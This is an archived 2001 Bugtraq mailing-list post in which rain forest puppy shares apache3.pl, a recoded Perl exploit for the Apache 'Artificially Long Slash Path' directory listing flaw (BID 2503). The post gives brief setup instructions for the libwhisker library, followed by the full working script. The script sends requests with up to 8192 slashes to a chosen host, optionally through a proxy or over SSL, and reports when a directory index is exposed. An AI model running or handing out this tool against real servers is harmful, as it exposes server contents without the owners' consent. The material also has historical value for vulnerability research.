linux, säkerhet

6683066 2001-06-28 18:06 -0500  /32 rader/ rain forest puppy <rfp@wiretrip.net>
Sänt av: joel@lysator.liu.se
Importerad: 2001-06-29  09:19  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern kopiemottagare: kmx@egatobas.org
Extern kopiemottagare: siberian@sentry-labs.com
Mottagare: Bugtraq (import) <17687>
Ärende: Re: Fw: Bugtraq ID 2503 : Apache Artificially Long Slash Path
------------------------------------------------------------
 Directory Listing Exploit

Well, I might as well have my hand in recoding this exploit. ;)

Attached is apache3.pl, which is a recoded version of Siberian's
recode of Matt Watchinski's exploit.  My version uses libwhisker,
which allows the exploit to have HTTP/1.1, proxy, and SSL support
automatically.  Basic support (not including SSL) should work for any
platform having Perl.

To use the attached exploit, you'll need a copy of libwhisker.  The
latest is pr3, downloadable at:
http://www.wiretrip.net/rfp/p/doc.asp?id=21&iface=7

You can either grab the developer tarball and build/install it, or
just grab the libwhisker.pm, put it in the same directory as the
apache3.pl, and just run apache3.pl--perl will use the libwhisker.pm
module in the same directory.

For SSL support, you'll need either Crypt::SSLeay or Net::SSLeay
installed (which may require OpenSSL).  I think ActiveState has
ported Crypt::SSLeay/Net::SSL (not Net::SSLeay) over to Windows, so
Windows users should have SSL support as well.

If anyone is interested in libwhisker and further using it, consider
joinging the whisker-devel mailing list at:
http://sourceforge.net/projects/whisker/

And as always, feedback always welcome.  See everyone at
BlackHat/DefCon!

- rfp
(6683066) /rain forest puppy <rfp@wiretrip.net>/(Ombruten)
Bilaga (text/plain) i text 6683067
6683067 2001-06-28 18:06 -0500  /90 rader/ rain forest puppy <rfp@wiretrip.net>
Bilagans filnamn: "apache3.pl"
Importerad: 2001-06-29  09:19  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern kopiemottagare: kmx@egatobas.org
Extern kopiemottagare: siberian@sentry-labs.com
Mottagare: Bugtraq (import) <17688>
Bilaga (text/plain) till text 6683066
Ärende: Bilaga (apache3.pl) till: Re: Fw: Bugtraq ID 2503 : Apache Artificially Long Slash Path
------------------------------------------------------------
 Directory Listing Exploit
#!/usr/bin/perl
#
# orginal by farm9, Inc. (copyright 2001)
# then modified by Siberian (www.sentry-labs.com)
# with more modifications by rfp (www.wiretrip.net/rfp/)
#
##########################################################################

use libwhisker;
use Getopt::Std;

# apache3.pl
# this exploit was modified to use the libwhisker library, which gives
# HTTP/1.1, proxy, and SSL support.  Plus, small other changes.

$|++;
my (%hin,%hout,%args);

print "Apache Artificially Long Slash Path Directory Listing
Exploit\n"; print "SecurityFocus BID 2503\n\n"; print "Original
exploit code written by Matt Watchinski (www.farm9.com)\n"; print
"Rewritten and fixed by Siberian (www.sentry-labs.com)\n"; print
"Moved to libwhisker by rfp\n\n";

getopts("p:L:H:sP:R:h:",\%args);

if($args{h} eq ''){
 print 'Usage: ./apache3.pl <options>, where options:',"\n";
 print '-h host  host to scan (must be specified)',"\n";
 print '-p ##	 host port (default: 80)',"\n";
 print '-L ##	 low end/start of range (default: 1)',"\n";
 print '-H ##	 high end/end of range (default: 8192)',"\n";
 print '-P host	 HTTP proxy via host',"\n";
 print '-R ##	 HTTP proxy port (default: 80)',"\n";
 print '-s	 use SSL (can\'t be used with proxy)',"\n";
 exit 0;
}

$low =  $args{L} || 1;
$high = $args{H} || 8192;

&lw::http_init_request(\%hin);		# setup our request hash

$hin{'whisker'}->{'host'}= $args{h};

$hin{'whisker'}->{'port'}= $args{p} || 80;

if(defined $args{s}){
 	$hin{'whisker'}->{'ssl'} = 1; 

	if(defined $args{P}){
		print "SSL not currently compatible with proxy\n";
		exit 1; 
	}
}

if(defined $args{'P'}){
	$hin{'whisker'}->{'proxy_host'}=$args{P};
	$hin{'whisker'}->{'proxy_port'}=$args{R} || 80;
	print "Using proxy host $hin{'whisker'}->{'proxy_host'} on ";
	print "port $hin{'whisker'}->{'proxy_port'}\n";
}


&lw::http_fixup_request(\%hin);		# fix any HTTP requirements

for($c=$low; $c<=$high; $c++){

	$hin{'whisker'}->{'uri'} = '/' x $c;

	if(&lw::http_do_request(\%hin,\%hout)){
		print "Error: $hout{'whisker'}->{'error'}\n";
		exit 1;
	} else {
		if($hout{'whisker'}->{'http_resp'} == 200 &&
			$hout{'whisker'}->{'data'}=~/index of/i){

			print "Found result using $c slashes.\n";
			exit 0;
		}
	}

	print "."; # for status
}

print "\nNot vulnerable (perhaps try a different range).\n";
(6683067) /rain forest puppy <rfp@wiretrip.net>/(Ombruten)